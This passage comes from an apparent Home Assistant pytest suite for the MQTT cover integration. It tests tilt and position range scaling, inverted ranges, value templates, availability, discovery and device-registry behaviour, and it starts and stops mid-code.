                "tilt_opened_value": 400,
                "tilt_closed_value": 125,
            }
        },
    )
    await hass.async_block_till_done()
    # Only Var1 drives the tilt attribute; Var2 is ignored.
    async_fire_mqtt_message(hass, "tilt-status-topic", '{"Var1": 9, "Var2": 30}')
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 9
    async_fire_mqtt_message(hass, "tilt-status-topic", '{"Var1": 50, "Var2": 10}')
    current_cover_tilt_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_TILT_POSITION
    ]
    assert current_cover_tilt_position == 50
    # A payload missing Var1 should produce a template warning in the log.
    async_fire_mqtt_message(hass, "tilt-status-topic", '{"Var2": 10}')
    assert (
        "Template variable warning: 'dict object' has no attribute 'Var1' when rendering"
    ) in caplog.text
async def test_tilt_via_topic_altered_range(hass, mqtt_mock):
    """Test tilt status via MQTT with altered tilt range."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_min": 0,
            "tilt_max": 50,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Device values 0..50 are scaled to HA's 0..100 percentage range.
    for payload, expected in (("0", 0), ("50", 100), ("25", 50)):
        async_fire_mqtt_message(hass, "tilt-status-topic", payload)
        tilt_position = hass.states.get("cover.test").attributes[
            ATTR_CURRENT_TILT_POSITION
        ]
        assert tilt_position == expected
async def test_tilt_status_out_of_range_warning(hass, caplog, mqtt_mock):
    """Test that a tilt status outside tilt_min/tilt_max logs a warning."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_min": 0,
            "tilt_max": 50,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # 60 exceeds tilt_max=50, so the payload must be rejected with a warning.
    async_fire_mqtt_message(hass, "tilt-status-topic", "60")
    expected_warning = (
        "Payload '60' is out of range, must be between '0' and '50' inclusive"
    )
    assert expected_warning in caplog.text
async def test_tilt_status_not_numeric_warning(hass, caplog, mqtt_mock):
    """Test that a non-numeric tilt status payload logs a warning."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_min": 0,
            "tilt_max": 50,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # A non-numeric payload must be rejected with a warning in the log.
    async_fire_mqtt_message(hass, "tilt-status-topic", "abc")
    assert "Payload 'abc' is not numeric" in caplog.text
async def test_tilt_via_topic_altered_range_inverted(hass, mqtt_mock):
    """Test tilt status via MQTT with altered tilt range and inverted tilt position."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            # min > max inverts the mapping between device and HA scales.
            "tilt_min": 50,
            "tilt_max": 0,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    for payload, expected in (("0", 100), ("50", 0), ("25", 50)):
        async_fire_mqtt_message(hass, "tilt-status-topic", payload)
        tilt_position = hass.states.get("cover.test").attributes[
            ATTR_CURRENT_TILT_POSITION
        ]
        assert tilt_position == expected
async def test_tilt_via_topic_template_altered_range(hass, mqtt_mock):
    """Test tilt status via MQTT and template with altered tilt range."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_status_template": "{{ (value | multiply(0.01)) | int }}",
            "tilt_opened_value": 400,
            "tilt_closed_value": 125,
            "tilt_min": 0,
            "tilt_max": 50,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # Payload is first divided by 100 by the template, then the resulting
    # device value (0..50) is scaled to HA's 0..100 percentage range.
    for payload, expected in (("99", 0), ("5000", 100), ("2500", 50)):
        async_fire_mqtt_message(hass, "tilt-status-topic", payload)
        tilt_position = hass.states.get("cover.test").attributes[
            ATTR_CURRENT_TILT_POSITION
        ]
        assert tilt_position == expected
async def test_tilt_position(hass, mqtt_mock):
    """Test setting tilt to an explicit position via service call."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # With the default range the requested tilt is published unchanged.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_TILT_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 50},
        blocking=True,
    )

    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "50", 0, False
    )
async def test_tilt_position_templated(hass, mqtt_mock):
    """Test tilt position rendered through tilt_command_template."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_command_template": "{{100-32}}",
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # The template output (100-32=68) replaces the requested tilt value.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_TILT_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 100},
        blocking=True,
    )

    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "68", 0, False
    )
async def test_tilt_position_altered_range(hass, mqtt_mock):
    """Test setting tilt position with an altered device range."""
    config = {
        cover.DOMAIN: {
            "platform": "mqtt",
            "name": "test",
            "state_topic": "state-topic",
            "command_topic": "command-topic",
            "qos": 0,
            "payload_open": "OPEN",
            "payload_close": "CLOSE",
            "payload_stop": "STOP",
            "tilt_command_topic": "tilt-command-topic",
            "tilt_status_topic": "tilt-status-topic",
            "tilt_opened_value": 400,
            "tilt_closed_value": 125,
            "tilt_min": 0,
            "tilt_max": 50,
        }
    }
    assert await async_setup_component(hass, cover.DOMAIN, config)
    await hass.async_block_till_done()

    # 50% of the device range 0..50 is 25, which is what gets published.
    await hass.services.async_call(
        cover.DOMAIN,
        SERVICE_SET_COVER_TILT_POSITION,
        {ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 50},
        blocking=True,
    )

    mqtt_mock.async_publish.assert_called_once_with(
        "tilt-command-topic", "25", 0, False
    )
async def test_find_percentage_in_range_defaults(hass, mqtt_mock):
    """Test find percentage in range with default range."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 100,
        "position_closed": 0,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 100,
        "tilt_closed_position": 0,
        "tilt_min": 0,
        "tilt_max": 100,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # With the default 0..100 range the conversion is the identity.
    assert mqtt_cover.find_percentage_in_range(44) == 44
    assert mqtt_cover.find_percentage_in_range(44, "cover") == 44
async def test_find_percentage_in_range_altered(hass, mqtt_mock):
    """Test find percentage in range with altered range."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 180,
        "position_closed": 80,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 180,
        "tilt_closed_position": 80,
        "tilt_min": 80,
        "tilt_max": 180,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # 120 in the 80..180 device range is 40% of the span.
    assert mqtt_cover.find_percentage_in_range(120) == 40
    assert mqtt_cover.find_percentage_in_range(120, "cover") == 40
async def test_find_percentage_in_range_defaults_inverted(hass, mqtt_mock):
    """Test find percentage in range with default range but inverted."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 0,
        "position_closed": 100,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 100,
        "tilt_closed_position": 0,
        "tilt_min": 100,
        "tilt_max": 0,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # Inverted 0..100 range: device value 44 corresponds to 56%.
    assert mqtt_cover.find_percentage_in_range(44) == 56
    assert mqtt_cover.find_percentage_in_range(44, "cover") == 56
async def test_find_percentage_in_range_altered_inverted(hass, mqtt_mock):
    """Test find percentage in range with altered range and inverted."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 80,
        "position_closed": 180,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 180,
        "tilt_closed_position": 80,
        "tilt_min": 180,
        "tilt_max": 80,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # Inverted 80..180 range: device value 120 corresponds to 60%.
    assert mqtt_cover.find_percentage_in_range(120) == 60
    assert mqtt_cover.find_percentage_in_range(120, "cover") == 60
async def test_find_in_range_defaults(hass, mqtt_mock):
    """Test find in range with default range."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 100,
        "position_closed": 0,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 100,
        "tilt_closed_position": 0,
        "tilt_min": 0,
        "tilt_max": 100,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # With the default 0..100 range percent-to-device is the identity.
    assert mqtt_cover.find_in_range_from_percent(44) == 44
    assert mqtt_cover.find_in_range_from_percent(44, "cover") == 44
async def test_find_in_range_altered(hass, mqtt_mock):
    """Test find in range with altered range."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 180,
        "position_closed": 80,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 180,
        "tilt_closed_position": 80,
        "tilt_min": 80,
        "tilt_max": 180,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # 40% of the 80..180 device range maps to device value 120.
    assert mqtt_cover.find_in_range_from_percent(40) == 120
    assert mqtt_cover.find_in_range_from_percent(40, "cover") == 120
async def test_find_in_range_defaults_inverted(hass, mqtt_mock):
    """Test find in range with default range but inverted."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 0,
        "position_closed": 100,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 100,
        "tilt_closed_position": 0,
        "tilt_min": 100,
        "tilt_max": 0,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # Inverted 0..100 range: 56% maps back to device value 44.
    assert mqtt_cover.find_in_range_from_percent(56) == 44
    assert mqtt_cover.find_in_range_from_percent(56, "cover") == 44
async def test_find_in_range_altered_inverted(hass, mqtt_mock):
    """Test find in range with altered range and inverted."""
    config = {
        "name": "cover.test",
        "state_topic": "state-topic",
        "get_position_topic": None,
        "command_topic": "command-topic",
        "availability_topic": None,
        "tilt_command_topic": "tilt-command-topic",
        "tilt_status_topic": "tilt-status-topic",
        "qos": 0,
        "retain": False,
        "state_open": "OPEN",
        "state_closed": "CLOSE",
        "position_open": 80,
        "position_closed": 180,
        "payload_open": "OPEN",
        "payload_close": "CLOSE",
        "payload_stop": "STOP",
        "payload_available": None,
        "payload_not_available": None,
        "optimistic": False,
        "value_template": None,
        "tilt_open_position": 180,
        "tilt_closed_position": 80,
        "tilt_min": 180,
        "tilt_max": 80,
        "tilt_optimistic": False,
        "set_position_topic": None,
        "set_position_template": None,
        "unique_id": None,
        "device_config": None,
    }
    mqtt_cover = MqttCover(hass, config, None, None)

    # Inverted 80..180 range: 60% maps back to device value 120.
    assert mqtt_cover.find_in_range_from_percent(60) == 120
    assert mqtt_cover.find_in_range_from_percent(60, "cover") == 120
# The tests below mostly delegate to the shared MQTT platform helper suite
# (help_test_*), passing this platform's domain and DEFAULT_CONFIG.
async def test_availability_when_connection_lost(hass, mqtt_mock):
    """Test availability after MQTT disconnection."""
    await help_test_availability_when_connection_lost(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_availability_without_topic(hass, mqtt_mock):
    """Test availability without defined availability topic."""
    await help_test_availability_without_topic(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_default_availability_payload(hass, mqtt_mock):
    """Test availability by default payload with defined topic."""
    await help_test_default_availability_payload(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_custom_availability_payload(hass, mqtt_mock):
    """Test availability by custom payload with defined topic."""
    await help_test_custom_availability_payload(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_valid_device_class(hass, mqtt_mock):
    """Test the setting of a valid sensor class."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "device_class": "garage",
                "state_topic": "test-topic",
            }
        },
    )
    await hass.async_block_till_done()
    # A valid device_class must be exposed as a state attribute.
    state = hass.states.get("cover.test")
    assert state.attributes.get("device_class") == "garage"
async def test_invalid_device_class(hass, mqtt_mock):
    """Test the setting of an invalid sensor class."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "device_class": "abc123",
                "state_topic": "test-topic",
            }
        },
    )
    await hass.async_block_till_done()
    # An invalid device_class fails config validation, so no entity is created.
    state = hass.states.get("cover.test")
    assert state is None
async def test_setting_attribute_via_mqtt_json_message(hass, mqtt_mock):
    """Test the setting of attribute via MQTT with JSON payload."""
    await help_test_setting_attribute_via_mqtt_json_message(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_setting_blocked_attribute_via_mqtt_json_message(hass, mqtt_mock):
    """Test the setting of attribute via MQTT with JSON payload."""
    await help_test_setting_blocked_attribute_via_mqtt_json_message(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG, MQTT_COVER_ATTRIBUTES_BLOCKED
    )
async def test_setting_attribute_with_template(hass, mqtt_mock):
    """Test the setting of attribute via MQTT with JSON payload."""
    await help_test_setting_attribute_with_template(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_update_with_json_attrs_not_dict(hass, mqtt_mock, caplog):
    """Test attributes get extracted from a JSON result."""
    await help_test_update_with_json_attrs_not_dict(
        hass, mqtt_mock, caplog, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_update_with_json_attrs_bad_json(hass, mqtt_mock, caplog):
    """Test attributes get extracted from a JSON result."""
    await help_test_update_with_json_attrs_bad_JSON(
        hass, mqtt_mock, caplog, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_discovery_update_attr(hass, mqtt_mock, caplog):
    """Test update of discovered MQTTAttributes."""
    await help_test_discovery_update_attr(
        hass, mqtt_mock, caplog, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_unique_id(hass, mqtt_mock):
    """Test unique_id option only creates one cover per id."""
    # Two covers sharing the same unique_id: the helper asserts only one
    # entity ends up registered.
    config = {
        cover.DOMAIN: [
            {
                "platform": "mqtt",
                "name": "Test 1",
                "state_topic": "test-topic",
                "unique_id": "TOTALLY_UNIQUE",
            },
            {
                "platform": "mqtt",
                "name": "Test 2",
                "state_topic": "test-topic",
                "unique_id": "TOTALLY_UNIQUE",
            },
        ]
    }
    await help_test_unique_id(hass, mqtt_mock, cover.DOMAIN, config)
async def test_discovery_removal_cover(hass, mqtt_mock, caplog):
    """Test removal of discovered cover."""
    data = '{ "name": "test", "command_topic": "test_topic" }'
    await help_test_discovery_removal(hass, mqtt_mock, caplog, cover.DOMAIN, data)
async def test_discovery_update_cover(hass, mqtt_mock, caplog):
    """Test update of discovered cover."""
    config1 = {"name": "Beer", "command_topic": "test_topic"}
    config2 = {"name": "Milk", "command_topic": "test_topic"}
    await help_test_discovery_update(
        hass, mqtt_mock, caplog, cover.DOMAIN, config1, config2
    )
async def test_discovery_update_unchanged_cover(hass, mqtt_mock, caplog):
    """Test update of discovered cover."""
    data1 = '{ "name": "Beer", "command_topic": "test_topic" }'
    with patch(
        "homeassistant.components.mqtt.cover.MqttCover.discovery_update"
    ) as discovery_update:
        await help_test_discovery_update_unchanged(
            hass, mqtt_mock, caplog, cover.DOMAIN, data1, discovery_update
        )
@pytest.mark.no_fail_on_log_exception
async def test_discovery_broken(hass, mqtt_mock, caplog):
    """Test handling of bad discovery message."""
    # "test_topic#" is an invalid MQTT topic (wildcard in publish topic).
    data1 = '{ "name": "Beer", "command_topic": "test_topic#" }'
    data2 = '{ "name": "Milk", "command_topic": "test_topic" }'
    await help_test_discovery_broken(
        hass, mqtt_mock, caplog, cover.DOMAIN, data1, data2
    )
async def test_entity_device_info_with_connection(hass, mqtt_mock):
    """Test MQTT cover device registry integration."""
    await help_test_entity_device_info_with_connection(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_entity_device_info_with_identifier(hass, mqtt_mock):
    """Test MQTT cover device registry integration."""
    await help_test_entity_device_info_with_identifier(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_entity_device_info_update(hass, mqtt_mock):
    """Test device registry update."""
    await help_test_entity_device_info_update(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_entity_device_info_remove(hass, mqtt_mock):
    """Test device registry remove."""
    await help_test_entity_device_info_remove(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_entity_id_update_subscriptions(hass, mqtt_mock):
    """Test MQTT subscriptions are managed when entity_id is updated."""
    await help_test_entity_id_update_subscriptions(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_entity_id_update_discovery_update(hass, mqtt_mock):
    """Test MQTT discovery update when entity_id is updated."""
    await help_test_entity_id_update_discovery_update(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_entity_debug_info_message(hass, mqtt_mock):
    """Test MQTT debug info."""
    await help_test_entity_debug_info_message(
        hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
    )
async def test_state_and_position_topics_state_not_set_via_position_topic(
    hass, mqtt_mock
):
    """Test state is not set via position topic when both state and position topics are set."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "position_topic": "get-position-topic",
                "position_open": 100,
                "position_closed": 0,
                "state_open": "OPEN",
                "state_closed": "CLOSE",
                "command_topic": "command-topic",
                "qos": 0,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert not state.attributes.get(ATTR_ASSUMED_STATE)
    async_fire_mqtt_message(hass, "state-topic", "OPEN")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    # Position updates must NOT flip the state while a dedicated state
    # topic is configured: state stays OPEN regardless of position 0/100.
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "get-position-topic", "100")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "state-topic", "CLOSE")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    # Same while CLOSED: position messages are ignored for the state.
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    async_fire_mqtt_message(hass, "get-position-topic", "100")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
async def test_set_state_via_position_using_stopped_state(hass, mqtt_mock):
    """Test the controlling state via position topic using stopped state."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "position_topic": "get-position-topic",
                "position_open": 100,
                "position_closed": 0,
                "state_open": "OPEN",
                "state_closed": "CLOSE",
                "state_stopped": "STOPPED",
                "command_topic": "command-topic",
                "qos": 0,
            }
        },
    )
    await hass.async_block_till_done()
    state = hass.states.get("cover.test")
    assert state.state == STATE_UNKNOWN
    assert not state.attributes.get(ATTR_ASSUMED_STATE)
    async_fire_mqtt_message(hass, "state-topic", "OPEN")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    async_fire_mqtt_message(hass, "get-position-topic", "0")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
    # With a position topic configured, STOPPED resolves to the state that
    # matches the last received position (0 -> closed, 100 -> open).
    async_fire_mqtt_message(hass, "state-topic", "STOPPED")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    async_fire_mqtt_message(hass, "get-position-topic", "100")
    state = hass.states.get("cover.test")
    assert state.state == STATE_CLOSED
    async_fire_mqtt_message(hass, "state-topic", "STOPPED")
    state = hass.states.get("cover.test")
    assert state.state == STATE_OPEN
async def test_position_via_position_topic_template(hass, mqtt_mock):
    """Test position by updating status via position template."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                # Template scales the raw payload down by 100.
                "position_template": "{{ (value | multiply(0.01)) | int }}",
            }
        },
    )
    await hass.async_block_till_done()
    # 99 * 0.01 -> 0 after int truncation.
    async_fire_mqtt_message(hass, "get-position-topic", "99")
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 0
    async_fire_mqtt_message(hass, "get-position-topic", "5000")
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 50
async def test_position_via_position_topic_template_json_value(hass, mqtt_mock, caplog):
    """Test position by updating status via position template with a JSON value."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                "position_template": "{{ value_json.Var1 }}",
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", '{"Var1": 9, "Var2": 60}')
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 9
    async_fire_mqtt_message(hass, "get-position-topic", '{"Var1": 50, "Var2": 10}')
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 50
    # Missing Var1 attribute must be logged as a template warning.
    async_fire_mqtt_message(hass, "get-position-topic", '{"Var2": 60}')
    assert (
        "Template variable warning: 'dict object' has no attribute 'Var1' when rendering"
    ) in caplog.text
async def test_position_template_with_entity_id(hass, mqtt_mock):
    """Test position by updating status via position template."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                # Template accumulates the new value onto the entity's own
                # current_position attribute (available via entity_id).
                "position_template": '\
                {% if state_attr(entity_id, "current_position") != None %}\
                {{ value | int + state_attr(entity_id, "current_position") }} \
                {% else %} \
                {{ value }} \
                {% endif %}',
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", "10")
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 10
    # Second message of 10 adds to the stored 10 -> 20.
    async_fire_mqtt_message(hass, "get-position-topic", "10")
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 20
async def test_position_via_position_topic_template_return_json(hass, mqtt_mock):
    """Test position by updating status via position template and returning json."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                # Template may return a JSON object; the "position" key is used.
                "position_template": '{{ {"position" : value} | tojson }}',
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", "55")
    current_cover_position_position = hass.states.get("cover.test").attributes[
        ATTR_CURRENT_POSITION
    ]
    assert current_cover_position_position == 55
async def test_position_via_position_topic_template_return_json_warning(
    hass, caplog, mqtt_mock
):
    """Test position by updating status via position template returning json without position attribute."""
    assert await async_setup_component(
        hass,
        cover.DOMAIN,
        {
            cover.DOMAIN: {
                "platform": "mqtt",
                "name": "test",
                "state_topic": "state-topic",
                "command_topic": "command-topic",
                "set_position_topic": "set-position-topic",
                "position_topic": "get-position-topic",
                # Wrong key ("pos" instead of "position") must trigger a warning.
                "position_template": '{{ {"pos" : value} | tojson }}',
            }
        },
    )
    await hass.async_block_till_done()
    async_fire_mqtt_message(hass, "get-position-topic", "55")
    assert (
